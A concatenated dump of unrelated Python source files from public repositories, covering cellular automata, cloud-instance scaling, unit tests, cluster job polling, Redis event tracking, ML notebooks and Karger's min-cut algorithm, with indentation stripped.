for i in range(self.n):
neighbours = self.get_neighbours(i)
tmp_space[i] = rule["".join([str(s) for s in neighbours])]
self.space = tmp_space
def get_neighbours(self, i: int):
if i == 0:
return np.insert(self.space[:2], 0, self.space[-1])
elif i == self.n - 1:
return np.insert(self.space[-2:], 2, self.space[0])
else:
return self.space[max(0, i - 1):i + 2]
def draw_cell(pos: tuple, gp_frame):
x, y, z = pos
gp_stroke = gp_frame.strokes.new()
gp_stroke.line_width = 500
gp_stroke.points.add(count=2)
gp_stroke.points[0].co = (x, 0, y)
gp_stroke.points[1].co = (x + 0.5, 0, y)
def animate_automata(rule):
automaton_size = 100
automaton = Automaton_1D(automaton_size)
nb_frames = 100
bpy.context.scene.frame_end = nb_frames
gp_layer = init_greasy_pencil()
gp_frame = gp_layer.frames.new(0)
#bpy.context.active_gpencil_brush.size = 100
#bpy.context.active_gpencil_brush.strength = 1.
# bpy.data.brushes["Draw Pencil"].size = 500
for frame in range(1, nb_frames+1):
#gp_frame = gp_layer.frames.new(frame)
gp_frame = gp_layer.frames.copy(gp_frame)
for i, cell in enumerate(automaton.space):
if cell:
draw_cell((i, frame, 0), gp_frame)
automaton.update(rule)
rule_0 = {'111': 1, '110': 1, '101': 1, '100': 1, '011': 1, '010': 1, '001': 1, '000': 0}
rule_sierpinski = {'111': 0, '110': 1, '101': 0, '100': 1, '011': 1, '010': 0, '001': 1, '000': 0}
rule_x = {'111': 0, '110': 0, '101': 0, '100': 1, '011': 1, '010': 1, '001': 1, '000': 0}
animate_automata(rule_0)
| 2,523 |
python/jaeger/scripts/generate_chiller_yaml.py
|
sdss/jaeger
| 1 |
2169308
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @Author: <NAME> (<EMAIL>)
# @Date: 2021-12-13
# @Filename: generate_chiller_yaml.py
# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)
from __future__ import annotations
import sys
import pandas
import yaml
BASE = """
address: 10.25.1.162
port: 1111
modules:
CHILLER:
mode: holding_register
channels: -1
description: APO chiller status variables
devices: {}
"""
NAME_CONV = {
"STATUS_FLUID_FLOW_SV": "STATUS_FLUID_FLOW",
"USER_FLOW_SP_GPM_SV": "FLOW_USER_SETPOINT",
"STATUS_DISPLAY_VALUE_SV": "DISPLAY_VALUE",
"USER_SETPOINT_SV": "TEMPERATURE_USER_SETPOINT",
"STATUS_AMBIENT_AIR_SV": "STATUS_AMBIENT_AIR",
}
def generate_chiller_yaml(variables_files: str):
"""Generates a YAML file for Drift with all the chiller variables from the CSV."""
variables = pandas.read_csv(variables_files)
data = yaml.load(BASE, yaml.SafeLoader)
devices = {}
for _, row in variables.iterrows():
address = row.Address - 1
name = row.Name.upper()
if name in NAME_CONV:
name = NAME_CONV[name]
devices[name] = {
"address": address,
"units": row.Unit if isinstance(row.Unit, str) else "",
"category": "chiller",
"description": row.Description,
}
if row.Scale != 1:
devices[name].update(
{
"adaptor": "proportional",
"adaptor_extra_params": [0.1],
}
)
data["modules"]["CHILLER"]["devices"] = devices
with open("chiller.yaml", "w") as f:
yaml.dump(data, f, yaml.SafeDumper)
if __name__ == "__main__":
generate_chiller_yaml(sys.argv[1])
| 1,801 |
tools/scripts/graph/kmeans_generator.py
|
DaMSL/K3
| 17 |
2168644
|
import random
D = 32
K = 5
N = 1 * 1000000
means = [[j * 10 for i in range(D)] for j in range(-2, 3)]
for i in range(N):
mean = random.choice(means)
point = [random.gauss(c, 2.5) for c in mean]
print(','.join("{:0.8f}".format(i) for i in point))
| 262 |
client/e2e/client.py
|
t1anchen/peer-py
| 0 |
2167816
|
import requests
import time
import json
from ml import *
import sys
import os
import argparse
from log import client_logger
from collections import Counter
ENDPOINT = "http://localhost:5000"
# client_cache = {}
# DRY_RUN_MODE = os.environ["DRY_RUN_MODE"] == "1"
def create(opts: dict):
n_create = opts["create"]
if n_create > 0:
client_logger.info("Creating new instances")
res = requests.get(ENDPOINT + f"/resource/scale/{n_create}").json()
instances = res["result"]
client_logger.debug(instances)
client_logger.info("Waiting for initializing new instances ...")
wait(90)
for instance in instances:
pub_ret = requests.get(
ENDPOINT + f"/resource/{instance}/public_ip"
).json()
def list_running(opts: dict):
# get active instance
client_logger.info(f"Getting info for active instances ...")
res = requests.get(ENDPOINT + "/resource").json()
opts["active_instances"] = [
k
for k in res["result"].keys()
if res["result"][k]["state"] == "running"
]
client_logger.debug(res)
return opts
def train_sample(opts):
active_instances = opts["active_instances"]
sample_interval_nsecs = opts["sample_interval_nsecs"]
round_interval_nsecs = opts["round_interval_nsecs"]
rounds = opts["training_rounds"]
opts["train_samples"] = {}
if opts["offline"]:
return list_cache(opts)
# opts = list_cache(opts)
for instance in active_instances:
res = requests.post(
ENDPOINT + f"/resource/{instance}/cpu",
data=json.dumps(
{
"sample_interval_nsecs": sample_interval_nsecs,
"round_interval_nsecs": round_interval_nsecs,
"rounds": rounds,
}
),
headers={"content-type": "application/json"},
).json()
opts["train_samples"][instance] = res["result"]
opts = list_cache(opts)
for instance in active_instances:
cpu_uts = opts[instance].get("cpu_ut", [])
cpu_uts.append(opts["train_samples"][instance])
opts[instance]["cpu_ut"] = cpu_uts
return opts
def list_cache(opts):
# list cache
# global client_cache
res = requests.get(ENDPOINT + "/cache").json()
client_logger.info(f"cache = {res['result']}")
for k, v in res["result"]['instances'].items():
opts[k] = v
return opts
def model_train(opts: dict):
# global client_cache
# client_logger.info(f"opts = {opts}")
active_instances = opts["active_instances"]
client_logger.debug(f"opts = {opts}")
for ins_id in active_instances:
client_logger.info(f"Training model for For instance {ins_id}")
ins = opts[ins_id]
client_logger.debug(f"ins = {ins}")
ctx = {"ins_id": ins_id, "offline": opts["offline"]}
if opts["offline"]:
ctx["offline"] = True
else:
for ut in ins["cpu_ut"]:
ctx = configure(ctx, ins_id, ut)
ctx = train(ctx)
ctx = cv_score(ctx)
# overview(ctx)
opts[ins_id]["ml_ctx"] = ctx
def predict_sample(opts):
# global client_cache
active_instances = opts["active_instances"]
sample_interval_nsecs = opts["sample_interval_nsecs"]
round_interval_nsecs = opts["round_interval_nsecs"]
rounds = opts["predicting_rounds"]
is_dry_run = opts["dry_run"]
client_logger.info(f"Getting new data from remote ...")
ret = {}
for instance in active_instances:
res = requests.post(
ENDPOINT + f"/resource/{instance}/cpu",
data=json.dumps(
{
"sample_interval_nsecs": sample_interval_nsecs,
"round_interval_nsecs": round_interval_nsecs,
"rounds": rounds,
}
),
headers={"content-type": "application/json"},
).json()
opts[instance]["cpu_ut"].append(res["result"])
def model_predict(opts: dict):
# global client_cache
is_dry_run = opts["dry_run"]
active_instances = opts["active_instances"]
if not opts["offline"]:
predict_sample(opts)
client_logger.info(f"Predicting ...")
for ins_id in active_instances:
cpu_ut_size = len(opts[ins_id]["cpu_ut"])
client_logger.info(f"cpu_ut_size = {cpu_ut_size}")
ut = opts[ins_id]["cpu_ut"][-1]
ctx = opts[ins_id]["ml_ctx"]
new_ctx = configure({}, ins_id, ut)
ctx["X_test"] = new_ctx["X"]
ctx["y_test"] = new_ctx["y"]
ctx = predict(ctx)
# overview(ctx)
# best_algo, best_score = [
# (k, v)
# for k, v in sorted(
# ctx["mean_accuracy_score"].items(), key=lambda item: abs(np.sum(item[1]) - 1)
# )
# ][0]
best_algo, best_score = select_best(ctx)
y_pred = ctx["y_pred"][best_algo]
client_logger.info(
f"ins_id = {ins_id} best_algo = {best_algo}, best_score = {best_score}, y_pred = {y_pred}"
)
if is_idle(y_pred):
if not is_dry_run:
client_logger.info(f"instance {ins_id} is terminating")
ter_ret = requests.delete(
ENDPOINT + f"/resource/{ins_id}"
).json()
else:
client_logger.info(f"instance {ins_id} will be terminated")
def terminate_all(opts: dict):
active_instances = opts["active_instances"]
is_dry_run = opts["dry_run"]
for instance in active_instances:
if not is_dry_run:
client_logger.info(f"instance {instance} is terminating")
ter_ret = requests.delete(ENDPOINT + f"/resource/{instance}").json()
else:
client_logger.info(f"instance {instance} will be terminated")
def wait(timeout: int):
click = 0
while click < timeout:
localtime = time.localtime()
print(f"remaining {(timeout - click):02d} secs", end="\r")
click += 1
time.sleep(1)
print()
def is_idle(y_pred):
counted = {k: v for k, v in Counter(y_pred).items()}
labels = sorted(k for k in counted.keys())
if len(labels) > 1 and counted[0] > counted[1]:
return True
elif len(labels) == 1 and 0 in labels:
return True
else:
return False
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--create", type=int, default=0)
parser.add_argument("--dry-run", action="store_true")
parser.add_argument("--offline", action="store_true", default=False)
parser.add_argument("--sample-interval-nsecs", type=float, default=0.2)
parser.add_argument("--round-interval-nsecs", type=int, default=0)
parser.add_argument("--training-rounds", type=int, default=80)
parser.add_argument("--predicting-rounds", type=int, default=20)
opts = vars(parser.parse_args())
client_logger.info("==== total start ====")
start_time = time.time()
create(opts)
if opts["create"] > 0:
client_logger.info("simulating stress")
wait(90)
opts = list_running(opts)
opts = train_sample(opts)
model_train(opts)
model_predict(opts)
end_time = time.time()
client_logger.info(f"==== total elapsed {end_time - start_time}s ====")
# if opts["enable_termination"]:
# opts = terminate_all(opts)
main()
| 7,449 |
tests/test_actions.py
|
safuya/juniper
| 0 |
2168328
|
# -*- coding: utf-8 -*-
"""
test_actions.py
:copyright: © 2019 by the EAB Tech team.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import json
from juniper import actions
from unittest.mock import MagicMock
from juniper.io import (reader, get_artifact_path)
logger = MagicMock()
def test_build_compose_sections():
"""
Using the processor-test as a sample definition of the lambda functions to
be packaged. Make sure that the resources portion of the file is correctly
generated.
The sections portion of the file, takes into account the volume mappings
as well as well as the command to invoke when docker-compose is invoked.
"""
processor_ctx = reader('./tests/processor-test.yml')
result = actions._get_compose_sections(processor_ctx)
# The fully converted docker-compose.yml file as created by the action.
expected = read_expectation('./tests/expectations/processor-sections.yml')
assert result == expected
def test_build_compose_writes_compose_definition_to_tmp_file(mocker):
"""
The docker-compose file created, is written to a tmp file. Make sure that
the file is writen and validate that the contents of the file match the
expected result.
"""
tmp_filename = '/<KEY>'
mock_writer = mocker.patch('juniper.actions.write_tmp_file', return_value=tmp_filename)
processor_ctx = reader('./tests/processor-test.yml')
actual_filename = actions.build_compose(logger, processor_ctx)
expected = read_expectation('./tests/expectations/processor-compose.yml')
assert tmp_filename == actual_filename
assert mock_writer.call_args[0][0] == expected
def test_build_artifacts_invokes_docker_commands(mocker):
"""
Validate that the docker-compose commands are executed with the valid paramters.
Since the docker-compose file was dynamically generated, we must pass the full
path of that file to docker-compose command. Also, set the context of the execution
to the current path.
"""
tmp_filename = <KEY>'
mock_builder = mocker.patch('juniper.actions.build_compose', return_value=tmp_filename)
# Mocking the dependencies of this action. These three high level packages are
# needed to invoke docker-compose in the right context!
mocker.patch('juniper.actions.os')
mocker.patch('juniper.actions.shutil')
mock_subprocess_run = mocker.patch('juniper.actions.subprocess.run')
compose_cmd_calls = [
mocker.call(["docker-compose", "-f", tmp_filename, '--project-directory', '.', 'down']),
mocker.call(["docker-compose", "-f", tmp_filename, '--project-directory', '.', 'up'])
]
processor_ctx = reader('./tests/processor-test.yml')
actions.build_artifacts(logger, processor_ctx)
mock_subprocess_run.assert_has_calls(compose_cmd_calls)
mock_builder.assert_called_once()
def test_build_artifacts_copies_scriopts(mocker):
"""
Since the docker-compose command will be executed from within the context
of where the lambda functions live. We need to make sure that the `package.sh`
lives in the right context.
Validate that a bin folder is temporarily created in the folder of the caller.
This folder will be removed after the .zip artifacts are generated.
"""
tmp_filename = '/var/folders/xw/yk2rrhks1w72y0zr_7t7b851qlt8b3/T/tmp52bd77s3'
mock_builder = mocker.patch('juniper.actions.build_compose', return_value=tmp_filename)
# Mocking the dependencies of this action. These three high level packages are
# needed to invoke docker-compose in the right context!
mock_os = mocker.patch('juniper.actions.os')
mock_shutil = mocker.patch('juniper.actions.shutil')
mocker.patch('juniper.actions.subprocess.run')
processor_ctx = reader('./tests/processor-test.yml')
actions.build_artifacts(logger, processor_ctx)
# Validate that this three step process is correctly executed.
mock_os.makedirs.assert_called_with('./.juni/bin', exist_ok=True)
mock_shutil.copy.assert_called_with(get_artifact_path('package.sh'), './.juni/bin/')
mock_shutil.rmtree.assert_called_with('./.juni', ignore_errors=True)
mock_builder.assert_called_once()
def test_build_compose_section_custom_output():
"""
Validate that given a custom output directory, the volume mapping incldues
the custom value instead of the default dist.
"""
sls_function = {}
custom_output_dir = './build_not_dist'
template = '"function_name": "{name}", "volumes": "{volumes}"'
context = {'package': {'output': custom_output_dir}}
result = actions._build_compose_section(context, template, 'test_func', sls_function)
as_json = json.loads('{' + result.replace('\n', '\\n') + '}')
assert len([
volume.strip()
for volume in as_json['volumes'].split('\n')
if custom_output_dir in volume
])
def read_expectation(file_name):
with open(file_name, 'r') as f:
return f.read()
| 5,499 |
py/dcp/problems/daily/construct_pair.py
|
bmoretz/Daily-Coding-Problem
| 1 |
2169769
|
"""
Construct Pair.
cons(a, b) constructs a pair, and car(pair) and cdr(pair) returns the first and last element of that pair.
For example, car(cons(3, 4)) returns 3, and cdr(cons(3, 4)) returns 4.
Given this implementation of cons:
def cons(a, b):
def pair(f):
return f(a, b)
return pair
"""
from typing import Callable
def cons(a, b) -> Callable[[int, int], Callable]:
"""
definition from problem
Args:
a ([type]): first element
b ([type]): last element
"""
def pair(f):
return f(a, b)
return pair
def car(pair : Callable[[int, int], Callable]) -> int:
"""
return the first element of the pair by invoking
the function (cons) with a lamba, then simply return
the first argument.
Args:
pair ([type]): pair constructed with cons
Returns:
[type]: first element
"""
return pair(lambda a, _: a)
def cdr(pair : Callable[[int, int], Callable]) -> int:
"""
return the second element of the pair by invoking
the function (cons) with a lamba, then simply return
the second argument.
Args:
pair ([type]): pair constructed with cons
Returns:
[type]: second element
"""
return pair(lambda _, b: b)
| 1,264 |
cluster/__init__.py
|
sepro/LSTrAP
| 7 |
2170247
|
import re
import sys
from subprocess import check_output, DEVNULL
from time import sleep
def detect_cluster_system():
"""
Checks which cluster manager is installed on the system, return "SGE" for Sun/Oracle Grid Engine, "PBS" for
PBS/Torque based systems and otherwise "other"
:return: string "SBE", "PBS" or "other"
"""
try:
which_output = check_output(["which", "sge_qmaster"], stderr=DEVNULL).decode("utf-8")
if "/sge_qmaster" in which_output:
return "SGE"
except Exception as _:
pass
try:
which_output = check_output(["which", "pbs_sched"], stderr=DEVNULL).decode("utf-8")
if "/pbs_sched" in which_output:
return "PBS"
except Exception as _:
pass
return "other"
def job_running(job_name):
"""
Checks if a specific job is still running on a cluster using the qstat command
:param job_name: name of the submitted script/jobname
:return: boolean true if the job is still running or in the queue
"""
running_jobs = []
c_system = detect_cluster_system()
if c_system == "SGE":
# Sun/Oracle Grid engine detected
qstat = check_output(["qstat", "-r"]).decode("utf-8")
pattern = "Full jobname:\s*" + job_name
running_jobs = re.findall(pattern, qstat)
elif c_system == "PBS":
# Sun/Oracle Grid engine detected
qstat = check_output(["qstat", "-f"]).decode("utf-8")
pattern = "Job_Name = \s*" + job_name
running_jobs = re.findall(pattern, qstat)
else:
print("Unsupported System", file=sys.stderr)
if len(running_jobs) > 0:
print('Still %d jobs running.' % len(running_jobs), end='\r')
else:
print('\nDone!\n')
return bool(len(running_jobs) > 0)
def wait_for_job(job_name, sleep_time=5):
"""
Checks if a job is running and sleeps for a set number of minutes if it is
:param job_name: name of the job to check
:param sleep_time: time to sleep between polls (in minutes, default = 5)
"""
while job_running(job_name):
sleep(sleep_time*60)
| 2,131 |
models/models_preprocessing_template.py
|
MichiganCOG/M-PACT
| 98 |
2168315
|
import tensorflow as tf
import numpy as np
from utils.preprocessing_utils import *
def preprocess_for_train(image, output_height, output_width, resize_side):
"""Preprocesses the given image for training.
Args:
image: A `Tensor` representing an image of arbitrary size.
output_height: The height of the image after preprocessing.
output_width: The width of the image after preprocessing.
resize_side: The smallest side of the image for aspect-preserving resizing.
Returns:
A preprocessed image.
"""
############################################################################
# TODO: Add preprocessing done during training phase #
# Preprocessing option found in utils/preprocessing_utils.py #
# #
# EX: image = aspect_preserving_resize(image, resize_side) #
# image = central_crop([image], output_height, output_width)[0] #
# image.set_shape([output_height, output_width, 3]) #
# image = tf.to_float(image) #
# return image #
############################################################################
def preprocess_for_eval(image, output_height, output_width, resize_side):
"""Preprocesses the given image for evaluation.
Args:
image: A `Tensor` representing an image of arbitrary size.
output_height: The height of the image after preprocessing.
output_width: The width of the image after preprocessing.
resize_side: The smallest side of the image for aspect-preserving resizing.
Returns:
A preprocessed image.
"""
############################################################################
# TODO: Add preprocessing done during training phase #
# Preprocessing option found in utils/preprocessing_utils.py #
# #
# EX: image = aspect_preserving_resize(image, resize_side) #
# image = central_crop([image], output_height, output_width)[0] #
# image.set_shape([output_height, output_width, 3]) #
# image = tf.to_float(image) #
# return image #
############################################################################
def preprocess_image(image, output_height, output_width, is_training=False,
resize_side_min=RESIZE_SIDE_MIN):
"""Preprocesses the given image.
Args:
image: A `Tensor` representing an image of arbitrary size.
output_height: The height of the image after preprocessing.
output_width: The width of the image after preprocessing.
is_training: `True` if we're preprocessing the image for training and
`False` otherwise.
resize_side_min: The lower bound for the smallest side of the image for
aspect-preserving resizing. If `is_training` is `False`, then this value
is used for rescaling.
Returns:
A preprocessed image.
"""
if is_training:
return preprocess_for_train(image, output_height, output_width,
resize_side_min)
else:
return preprocess_for_eval(image, output_height, output_width,
resize_side_min)
# END IF
def preprocess(input_data_tensor, frames, height, width, channel, input_dims, output_dims, seq_length, size, label, istraining, video_step, input_alpha=1.0):
"""
Preprocessing function corresponding to the chosen model
Args:
:input_data_tensor: Raw input data
:frames: Total number of frames
:height: Height of frame
:width: Width of frame
:channel: Total number of color channels
:input_dims: Number of frames to be provided as input to model
:output_dims: Total number of labels
:seq_length: Number of frames expected as output of model
:size: Output size of preprocessed frames
:label: Label of current sample
:istraining: Boolean indicating training or testing phase
Return:
Preprocessing input data and labels tensor
"""
# Allow for resampling of input during testing for evaluation of the model's stability over video speeds
input_data_tensor = tf.cast(input_data_tensor, tf.float32)
input_data_tensor = resample_input(input_data_tensor, frames, frames, input_alpha)
# Apply preprocessing related to individual frames (cropping, flipping, resize, etc.... )
input_data_tensor = tf.map_fn(lambda img: preprocess_image(img, size[0], size[1], is_training=istraining, resize_side_min=size[0]), input_data_tensor)
##########################################################################################################################
# #
# TODO: Add any video related preprocessing (looping, resampling, etc.... Options found in utils/preprocessing_utils.py) #
# #
##########################################################################################################################
return input_data_tensor
| 5,713 |
redisEventTracker/__init__.py
|
Keyintegrity/redisEventTracker
| 0 |
2170114
|
# encoding: utf-8
from redis import StrictRedis
from datetime import datetime
import warnings
import logging
import socket
import time
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
class Graphite(object):
def __init__(self, host='localhost', port=2003, prefix=''):
self.socket = socket.socket()
self.socket.connect((host, port))
self.prefix = 'event_tracker.'
if prefix:
self.prefix += prefix + '.'
def send_metric(self, metric_name, msg):
metric_name = self.prefix + metric_name
message = '%s %s %d\n' % (metric_name, msg, int(time.time()))
self.socket.sendall(message)
class Singleton(object):
_instance = None
def __new__(cls, *args, **kwargs):
if not cls._instance:
cls._instance = super(Singleton, cls).__new__(cls, *args, **kwargs)
return cls._instance
class EventTracker(Singleton):
_redis = None
def __init__(self, redis=None, host='localhost', port=6379, db=0, connection_pool=None, graphite_host=None,
graphite_port=2003, graphite_prefix=''):
self.set_connection_to_redis(redis or self.get_connection_to_redis(host=host, port=port, db=db,
connection_pool=connection_pool))
self.graphite_host = graphite_host
self.graphite_port = graphite_port
self.graphite = None
if graphite_host:
try:
self.graphite = Graphite(graphite_host, graphite_port, graphite_prefix)
except Exception as e:
msg = u"could not connect to graphite server: %s" % unicode(e)
warnings.warn(msg)
logger.warning(msg)
@staticmethod
def get_connection_to_redis(**kwargs):
return StrictRedis(**kwargs)
def set_connection_to_redis(self, redis):
self._redis = redis
def track_event(self, event_hash_name):
date = datetime.now().date()
try:
if not self._redis.sismember('dates', date):
self._redis.sadd('dates', date)
total = self._redis.hincrby(event_hash_name, date, 1)
if self.graphite:
self.graphite.send_metric(event_hash_name, total)
except Exception as e:
warnings.warn(unicode(e))
logger.exception(u'{0}; event: {1}'.format(unicode(e), event_hash_name))
| 2,470 |
notebooks/develop/2021-04-14-gc-hd-pos2gram_testing.py
|
grchristensen/avpd
| 0 |
2169284
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
from pathlib import Path
from os.path import join
from tqdm import tqdm
import random
from matplotlib import pyplot as plt
import math
project_root = Path('..')
preprocess_path = join(project_root, Path('data/preprocess'))
random.seed(10)
# Thoughts: thresholds need to be custom to each profile. This would be a good opportunity to try to make a profile that gets more confident the more data about the author it has. The profile could model distributions of the differences between its sentences to its mean and other people's sentences to its mean. Then it can use these two distributions to determine which is more likely for incoming sentences.
#
# Question: Can euclidean distances from the mean or cosine similarites be treated as normal random variables?
# In[2]:
# Using function words for these experiments
function_words_train = pd.read_hdf(join(preprocess_path, "bawe_train_preprocessed_function_word_counter.hdf5"))
pos_bigrams_train = pd.read_hdf(join(preprocess_path, "bawe_train_preprocessed_pos2gram_counter.hdf5"))
train_set = pd.read_hdf(join(preprocess_path, "bawe_train_sentences.hdf5"))
# function_words_train = pd.concat([function_words_train, pos_bigrams_train], axis=1)
function_words_train = pos_bigrams_train
function_words_train
# In[3]:
std_train = (function_words_train - function_words_train.mean()) / function_words_train.std()
std_train
# In[ ]:
pca_vals, pca_vecs = np.linalg.eig(std_train.cov())
pca_vals
# In[3]:
# train_set.loc[(2, 3)]
train_set.loc[6]
# In[4]:
def select_good_features(df):
overall_var = df.var()
author_vars = df.groupby(level="author").var()
mean_explained_var = (overall_var - author_vars).mean()
# Features that reduce the variance within classes should hopefully be good
# features.
selections = mean_explained_var > 0
# The index of selctions should be the columns of the dataframe given the
# last few operations.
chosen_columns = selections[selections].index.tolist()
return df[chosen_columns]
# In[5]:
filtered_train = select_good_features(function_words_train)
filtered_train
# In[6]:
authors = filtered_train.index.get_level_values("author")
author_set = list(set(authors))
# experiment_authors = random.sample(author_set, 5)
experiment_authors = [1, 2, 5, 6]
experiment_authors
# In[7]:
# chosen_author = experiment_authors[5]
chosen_author = 6
chosen_author_sentences = filtered_train.loc[chosen_author]
chosen_author_sentences
# Question: If I take the mean of each sentence distance and include it in the mean instead of excluding it, does this affect the mean/var distance?
# In[8]:
included_sentences_distances = np.linalg.norm(chosen_author_sentences - chosen_author_sentences.mean(), axis=1)
included_sentences_distances_mean = included_sentences_distances.mean()
included_sentences_distances_var = included_sentences_distances.var()
def get_excluded_sentence_distances(array):
def sentence_distance(i):
selection = [True] * len(array)
selection[i] = False
return np.linalg.norm(array[i] - np.mean(array[selection]))
return np.array([sentence_distance(index) for index in range(len(array))])
excluded_sentence_distances = get_excluded_sentence_distances(chosen_author_sentences.to_numpy())
excluded_sentence_distances_mean = excluded_sentence_distances.mean()
excluded_sentence_distances_var = excluded_sentence_distances.var()
included_sentences_distances_mean, excluded_sentence_distances_mean
# Answer: Yes :(, the mean is consistently much lower because the sentence is included. This is unfortunate because the other method was much more efficient to compute.
# In[9]:
# plt.hist(excluded_sentence_distances)
# plt.show()
# Answer to previous question: Euclidean distances are not normal (no doy why would they be? euclidean distances from same distribution mean should on average be close to 0 and can't be lower than that).
#
# Question: What if I just pick a threshold that accounts for 95% of the author's sentences.
# In[10]:
# chosen_text = chosen_author_sentences.loc[0]
# chosen_sentence_distances = get_excluded_sentence_distances(chosen_text.to_numpy())
# index_threshold = math.floor(len(chosen_sentence_distances) * 0.6)
# threshold = np.sort(chosen_sentence_distances)[index_threshold]
# threshold, index_threshold
# In[11]:
chosen_author_sentences
# In[12]:
chosen_text = chosen_author_sentences.drop(index=(0,))
chosen_text
# In[13]:
normalized_text = (chosen_text - chosen_text.mean()) / chosen_text.var()
# Come back here on error
chosen_cov = chosen_text.cov()
eig_values, eig_vectors = np.linalg.eig(chosen_cov)
eig_values, eig_vectors = eig_values.real, eig_vectors.real
eig_sum = np.sum(eig_values)
k = 15
phi_list = chosen_text - chosen_text.mean()
omega_list = np.sum((phi_list[:k] * eig_vectors[:, :k].T), axis=1).to_numpy()
phi_hat = np.sum((omega_list[:k] * eig_vectors[:, :k]), axis=1)
np.flip(phi_hat)
# In[14]:
profile_mean = chosen_text.mean()
cutoff_texts = chosen_text
diffs = cutoff_texts - chosen_text.mean() - phi_hat
distances = np.linalg.norm(diffs, axis=1)
distances
# In[15]:
cutoff = np.mean(distances) + (np.std(distances) / 3.5)
cutoff
# In[16]:
same_distances = distances[distances > cutoff]
# In[17]:
outlier_cutoff = np.mean(same_distances) + (np.std(same_distances) / 3.5)
# np.sum(same_distances > outlier_cutoff) / distances.shape[0]
np.sum(same_distances > outlier_cutoff) / len(same_distances)
# In[18]:
filtered_train.loc[1].mean()
# In[19]:
np.linalg.norm(filtered_train.loc[1].mean() - filtered_train.mean())
# In[20]:
# suspect_texts = filtered_train.loc[experiment_authors[1], 0]
suspect_texts = filtered_train.drop(index=(chosen_author,))
# suspect_texts = chosen_author_sentences.loc[1]
suspect_diffs = suspect_texts - profile_mean - phi_hat
suspect_distances = np.linalg.norm(suspect_diffs, axis=1)
first_suspect_distances = suspect_distances[suspect_distances > cutoff]
# np.sum(first_suspect_distances > outlier_cutoff) / len(suspect_distances)
np.sum(first_suspect_distances > outlier_cutoff) / len(first_suspect_distances)
# In[21]:
# def euclidean_distance(mean, df):
# return np.linalg.norm(mean - df, axis=1)
# chosen_text_mean = chosen_text.mean()
# same_texts = chosen_author_sentences.drop(index=(0,))
# other_author_texts = filtered_train.drop(index=(chosen_author,))
# same_sentence_classifications = pd.DataFrame(
# euclidean_distance(chosen_text_mean, same_texts) > threshold, index=same_texts.index
# )
# other_sentence_classifications = pd.DataFrame(
# euclidean_distance(chosen_text_mean, other_author_texts) > threshold, index=other_author_texts.index
# )
# same_text_classifications = same_sentence_classifications.groupby(level=("text_id")).mean() > 0.5
# other_text_classifications = other_sentence_classifications.groupby(level=("author", "text_id")).mean() > 0.5
# same_flags = same_text_classifications.sum()
# same_length = len(same_text_classifications)
# other_flags = other_text_classifications.sum()
# other_length = len(other_text_classifications)
# tnr = (same_length - same_flags) / same_length
# tpr = other_flags / other_length
# tnr[0], tpr[0]
| 7,337 |
testagent/structure/testinstance.py
|
patriziotufarolo/testagent
| 1 |
2170125
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This file is part of cumulus-testagent.
# https://github.com/patriziotufarolo/cumulus-testagent
# Licensed under the MIT license:
# http://www.opensource.org/licenses/MIT-license
# Copyright (c) 2015, <NAME> <<EMAIL>>
class TestInstance(object):
def __init__(self, operation):
self.__preConditions = ""
self.__hiddenCommunications = ""
self.__expectedOutput = ""
self.__postConditions = ""
self.__input = {}
self.__operation = operation
def getOperation(self):
return self.__operation
def setPreConditions(self, pc):
self.__preConditions = pc
return
def getPreConditions(self):
return self.__preConditions
def setHiddenCommunications(self, hc):
self.__hiddenCommunications = hc
return
def getHiddenCommunications(self):
return self.__hiddenCommunications
def appendInput(self, key, value):
self.__input[key] = value
return
def getInputs(self):
return self.__input
def setExpectedOutput(self, eo):
self.__expectedOutput = eo
return
def getExpectedOutput(self):
return self.__expectedOutput
def setPostConditions(self, pc):
self.__postConditions = pc
return
def getPostConditions(self):
return self.__postConditions
| 1,402 |
magicwand-data-generator/magicwand/magicwand_components/attacks/__init__.py
|
gregpaton08/magicwand-datatool
| 22 |
2170129
|
from .apachekill import *
from .sockstress import *
from .goloris import *
from .sht_rudeadyet import *
from .sht_slowloris import *
from .sht_slowread import *
from .httpflood import *
from .synflood import *
| 210 |
graph algorithms/Karger's min cut/Karger's min cut.py
|
Zymrael/Algorithm-greatest-hits
| 0 |
2168714
|
# -*- coding: utf-8 -*-
"""
Created on Sun Jan 6 10:41:07 2019
@author: Zymieth
"""
import numpy as np
with open('L:\Algorithms\kargerMinCut.txt') as file:
graph = [n for n in [line.split('\t')[:-1] for line in file]]
class Graph(object):
def __init__(self,adjacency_list):
self.adj = {}
for i,d in enumerate(adjacency_list):
self.adj[i+1] = [int(num) for num in d]
self.og = self.adj
self.deleteSelfLoops()
def selectNode(self):
return np.random.choice(list(self.adj.keys()),replace=False)
def selectEdge(self,node):
return np.random.choice(self.adj[node],replace=False)
def contract(self,node,edge):
self.adj[edge] = list(filter(lambda x: x != node,self.adj[edge]))
self.adj[edge].extend(list(filter(lambda x: x != edge,self.adj[node])))
del self.adj[node]
self.replace(node,edge)
def deleteSelfLoops(self):
for key in self.adj.keys():
self.adj[key] = list(filter(lambda x: x != key, self.adj[key]))
def replace(self,inst1,inst2):
for key in self.adj.keys():
self.adj[key] = [i if i!=inst1 else inst2 for i in self.adj[key]]
def findMinCut(self, iterations = 10):
min_cut = len(self.adj)
for i in range(iterations):
while len(list(self.adj.keys())) > 2:
node = self.selectNode()
edge = self.selectEdge(node)
self.contract(node,edge)
if min([len(i) for i in list(self.adj.values())]) < min_cut:
min_cut = min([len(i) for i in list(self.adj.values())])
self.adj = self.og
return min_cut
s_graph = [[2],[1,3],[2,4],[3]]
G = Graph(s_graph)
x = G.findMinCut()
s_graph = graph
G = Graph(s_graph)
x = G.findMinCut(iterations=10000000)
| 1,933 |
experiments/dgp_kin8nm_adaptive_pruning.py
|
akuhren/selective_gp
| 14 |
2169423
|
#!/usr/bin/env python
import mlflow
from selective_gp.utils import (
load_data, get_model, get_ELBO, get_loglik, get_experiment_id,
